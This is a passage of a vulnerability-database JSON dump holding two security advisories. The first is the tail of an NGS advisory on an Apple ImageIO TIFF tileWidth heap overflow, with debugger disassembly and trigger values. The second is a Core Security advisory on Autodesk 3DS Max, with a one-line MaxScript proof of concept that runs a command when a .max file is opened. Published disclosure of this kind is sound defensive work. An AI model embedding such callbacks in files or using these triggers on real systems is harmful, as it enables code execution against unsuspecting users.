<getBandProcTIFF+488>: inc eax\r\n0x00007fff80f76672 <getBandProcTIFF+490>: jne 0x7fff80f76680<getBandProcTIFF+504>\r\n0x00007fff80f76674 <getBandProcTIFF+492>: mov rdi,QWORD PTR [rbp-0x508]\r\n0x00007fff80f7667b <getBandProcTIFF+499>: jmp 0x7fff80f76917<getBandProcTIFF+1167>\r\n0x00007fff80f76680 <getBandProcTIFF+504>: mov eax,r15d\r\n0x00007fff80f76683 <getBandProcTIFF+507>: add eax,DWORD PTR [rbp-0x38]\r\n0x00007fff80f76686 <getBandProcTIFF+510>: cmp QWORD PTR [rbp-0x4e0],rax\r\n0x00007fff80f7668d <getBandProcTIFF+517>: jae 0x7fff80f7669b<getBandProcTIFF+531>\r\n0x00007fff80f7668f <getBandProcTIFF+519>: mov rdx,QWORD PTR [rbp-0x4e0]\r\n0x00007fff80f76696 <getBandProcTIFF+526>: sub rdx,rbx\r\n0x00007fff80f76699 <getBandProcTIFF+529>: jmp 0x7fff80f7669e<getBandProcTIFF+534>\r\n0x00007fff80f7669b <getBandProcTIFF+531>: mov edx,DWORD PTR [rbp-0x34]\r\n0x00007fff80f7669e <getBandProcTIFF+534>: mov rcx,QWORD PTR [rbp-0x4d8]\r\n0x00007fff80f766a5 <getBandProcTIFF+541>: mov rax,QWORD PTR [rcx+0x18]\r\n0x00007fff80f766a9 <getBandProcTIFF+545>: imul rdx,rax\r\n0x00007fff80f766ad <getBandProcTIFF+549>: lea r13,[rdx+0x7]\r\n0x00007fff80f766b1 <getBandProcTIFF+553>: shr r13,0x3\r\n0x00007fff80f766b5 <getBandProcTIFF+557>: imul rbx,rax\r\n0x00007fff80f766b9 <getBandProcTIFF+561>: lea rax,[rbx+0x7]\r\n0x00007fff80f766bd <getBandProcTIFF+565>: shr rax,0x3\r\n0x00007fff80f766c1 <getBandProcTIFF+569>: mov rdx,QWORD PTR [rbp-0x4b8]\r\n0x00007fff80f766c8 <getBandProcTIFF+576>: lea rbx,[rax+rdx]\r\n0x00007fff80f766cc <getBandProcTIFF+580>: xor r12d,r12d\r\n\r\n// loops copying from a ptr in to a buffer\r\n\r\n0x00007fff80f766cf <getBandProcTIFF+583>: jmp 0x7fff80f766f6<getBandProcTIFF+622>\r\n0x00007fff80f766d1 <getBandProcTIFF+585>: imul rax,QWORD PTR [rbp-0x510]\r\n0x00007fff80f766d9 <getBandProcTIFF+593>: mov rcx,QWORD PTR [rbp-0x508]\r\n0x00007fff80f766e0 <getBandProcTIFF+600>: lea rsi,[rax+rcx]\r\n0x00007fff80f766e4 <getBandProcTIFF+604>: mov rdx,r13\r\n0x00007fff80f766e7 <getBandProcTIFF+607>: mov rdi,rbx\r\n0x00007fff80f766ea <getBandProcTIFF+610>: call 0x7fff8104cdb4 <dyld_stub_memcpy>//crash in memcpy\r\n0x00007fff80f766ef <getBandProcTIFF+615>: add rbx,QWORD PTR [rbp-0x4f0]\r\n0x00007fff80f766f6 <getBandProcTIFF+622>: mov eax,r12d\r\n0x00007fff80f766f9 <getBandProcTIFF+625>: inc r12\r\n0x00007fff80f766fc <getBandProcTIFF+628>: cmp QWORD PTR [rbp-0x4b0],rax\r\n0x00007fff80f76703 <getBandProcTIFF+635>: ja 0x7fff80f766d1<getBandProcTIFF+585>\r\n0x00007fff80f76705 <getBandProcTIFF+637>: add r15d,DWORD PTR [rbp-0x34]\r\n0x00007fff80f76709 <getBandProcTIFF+641>: mov ebx,r15d\r\n0x00007fff80f7670c <getBandProcTIFF+644>: cmp rbx,QWORD PTR [rbp-0x4e0]\r\n0x00007fff80f76713 <getBandProcTIFF+651>: jb 0x7fff80f76648<getBandProcTIFF+448>\r\n0x00007fff80f76719 <getBandProcTIFF+657>: mov r14,QWORD PTR [rbp-0x468]\r\n0x00007fff80f76720 <getBandProcTIFF+664>: cmp r14,QWORD PTR [rbp-0x500]\r\n0x00007fff80f76727 <getBandProcTIFF+671>: jne 0x7fff80f765e1<getBandProcTIFF+345>\r\n0x00007fff80f7672d <getBandProcTIFF+677>: mov rdi,QWORD PTR [rbp-0x508]\r\n0x00007fff80f76734 <getBandProcTIFF+684>: jmp 0x7fff80f76d2d<getBandProcTIFF+2213>\r\n0x00007fff80f76739 <getBandProcTIFF+689>: mov rax,QWORD PTR [rbp-0x4d8]\r\n0x00007fff80f76740 <getBandProcTIFF+696>: cmp BYTE PTR [rax+0x45],0x0\r\n0x00007fff80f76744 <getBandProcTIFF+700>: je 0x7fff80f76d37<getBandProcTIFF+2223>\r\n0x00007fff80f7674a <getBandProcTIFF+706>: mov r13,QWORD PTR [rax+0x10]\r\n\r\nIt appears as the tileWidth controls the size of the iterator in a previous loop. In turn we can control the number of times the memcpy() is called and the amount of buffer copied. \r\n\r\nFor example, tileWidth = FF00:\r\n\r\nBreakpoint 6, 0x00007fff80f766ea in getBandProcTIFF ()\r\nr12 0x473 1139\r\n0x7fff80f766ea <getBandProcTIFF+610>: call 0x7fff8104cdb4<dyld_stub_memcpy>\r\n\r\nThe number of iterations is stored in the $r12 register. \r\n\r\nDecreasing the tileWidth causes the loop to iterate more, tileWidth=DD00 because the value incremented is lower: \r\n\r\nr12 0x478 1144 \r\n\r\nWhen we use a large value such as, 00800000 (8388608) we only call memcpy() once:\r\n\r\nr12 0x1 1\r\n(gdb) x/i $rip\r\n0x7fffffe00847 <__memcpy+167>: movdqa XMMWORD PTR [rdi+rcx],xmm0\r\n(gdb)\r\n\r\nI believe this triggers the integer overflow and in turn an overflow in the memcpy.\r\n\r\n===============\r\nFix Information\r\n===============\r\n\r\nApple has released a patch that addresses the issue. The announcement of the patch can be found here:\r\n\r\nhttp://support.apple.com/kb/HT4723\r\n\r\nNGS Secure Research\r\nhttp://www.ngssecure.com\r\n", "modified": "2011-10-16T00:00:00", "published": "2011-10-16T00:00:00", "id": "SECURITYVULNS:DOC:27160", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27160", "title": "NGS00062 Technical Advisory: Apple OSX / iPhone ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "coresecurity": [{"lastseen": "2017-01-13T17:00:46", "bulletinFamily": "info", "description": "Core Security - CoreLabs\n\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\n\n### 1\\. Advisory Information\n\n**Title: **Autodesk 3DS Max Application Callbacks Arbitrary Command Execution \n**Advisory Id: **CORE-2009-0909 \n**Advisory URL: **[http://www.coresecurity.com/content/3dsmax-arbitrary-command-execution](<3dsmax-arbitrary-command-execution>) \n**Date published: **2009-11-23 \n**Date of last update: **2009-11-20 \n**Vendors contacted: **Autodesk \n**Release mode: **User release\n\n### 2\\. Vulnerability Information\n\n**Class: **Failure to Sanitize Data into a Different Plane [[CWE-74](<http://cwe.mitre.org/data/definitions/74.html>)] \n**Impact: **Code execution \n**Remotely Exploitable: **Yes \n**Locally Exploitable: **No \n**Bugtraq ID: **[36634](<http://www.securityfocus.com/bid/36634>) \n**CVE Name: **[CVE-2009-3577](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3577>)\n\n### 3\\. Vulnerability Description\n\nAutodesk 3D Studio Max [2] is a modeling, animation and redering package widely used for video game , film , multimedia and web content developement. The software provides a built-in scripting language, allowing users to bind custome code to actions performed in the applciation. Execution of scripting code does not require explicit permission from the user. This mechanim can be exploited by an attacker to execute arbitrary code by enticing a victim to open .max file with MaxScript application callbacks embedded.\n\n### 4\\. Vulnerable packages\n\n * Autodesk 3DSMax 2010\n * Autodesk 3DSMax 2009\n * Autodesk 3DSMax 2008\n * Autodesk 3DSMax 9\n * Autodesk 3DSMax 8\n * Autodesk 3DSMax 7\n * Autodesk 3DSMax 6\n\n### 5\\. Vendor Information, Solutions and Workarounds\n\nThe vendor did not provide fixes or workaround information.\n\nYou can disable the automatic loading of embedded MaxScript by following these steps:\n\n * Go to Customize menu > Preferences > Preference Settings dialog > MAXScript.\n * Uncheck \"Load/Save Scene Scripts\".\n * Uncheck \"Load/Save Persistent Globals\".\n\n### 6\\. Credits\n\nThis vulnerability was discovered and researched by Sebasti\u00e1n Tello from Core Security Technologies during Bugweek 2009 [1].\n\nThe publication of this advisory was coordinated by Fernando Russ from Core Security Advisories Team.\n\n### 7\\. Technical Description / Proof of Concept Code\n\nAutodesk 3D Studio Max provides built-in scripting language called MaxScript, which can be used to automate repetitive tasks, combine existing functionality in new ways, develop new tools and user interfaces and much more. Max allows users to bind MaxScript to application callbacks in a way that could be exploited by an attacker to execute arbitrary code by enticing a victim to open .max file with MaxScript application callbacks embedded.\n\nA Proof of Concept file can be obtained by following these simple steps. Open Max, press F11 (MaxScript Listener), and paste this code:\n \n \n callbacks.addScript #filePostOpen (\"DOSCommand(\\\"calc.exe\\\")\") id:#mbLoadCallback persistent:true \n \n\n### 8\\. Report Timeline\n\n * **2009-08-25: **Core Security Technologies ask the Autodesk Assistance Team for a security contact to report the vulnerability.\n * **2009-09-22: **Core asks the Autodesk Assistance Team for a security contact to report the vulnerability.\n * **2009-10-09: **Core contacts CERT to obtain security contact information for Autodesk.\n * **2009-10-16: **CERT acknowledges the communication.\n * **2009-10-19: **CERT sends their available contact information for Autodesk.\n * **2009-10-19: **Core notifies Autodesk of the vulnerabilty report and announces its initial plan to publish the content on November 2nd, 2009. Core requests an acknoledgement within two working days and asks whehter the details should be sent encrypted or in plaintext.\n * **2009-10-19: **Autodesk acknowledges the report and requests the information to be provided in encrypted form.\n * **2009-10-20: **Core sends draft advisory and steps to reproduce the issue.\n * **2009-10-27: **Core asks Autodesk about the status of the vulnerability report sent on October 20th, 2009.\n * **2009-10-27: **Autodesk acknowledges the communication indicating that the pertinent Product Managers have been informed and are formulating a response.\n * **2009-11-06: **Core notifies Autodesk about the missed deadline of November 2nd, 2009 and reuqests an status update. Publication of CORE-2009-0909 is re-scheduled to November 16th, 2009 and is subject to change based on concrete feedback from Autodesk.\n * **2009-11-23: **Given the lack of response from Autodesk, Core decides to publish the advisory CORE-2009-0909 as \"user release\".\n\n### 9\\. References\n\n[1] The author participated in Core Bugweek 2009 as member of the team \"Gimbal Lock N Load\". \n[2] [http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112](<http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112>)\n\n### 10\\. About CoreLabs\n\nCoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [](<http://www.coresecurity.com/corelabs>)<http://www.coresecurity.com/corelabs>.\n\n### 11\\. About Core Security Technologies\n\nCore Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [](<http://www.coresecurity.com>)<http://www.coresecurity.com>.\n\n### 12\\. Disclaimer\n\nThe contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.\n\n### 13\\. PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.\n", "modified": "2009-11-20T00:00:00", "published": "2009-11-23T00:00:00", "href": "https://www.coresecurity.com/content/3dsmax-arbitrary-command-execution", "id": "CORE-2009-0909", "type": "coresecurity", "title": "Autodesk 3DS Max Application Callbacks Arbitrary Command Execution", "cvss": {}}]}
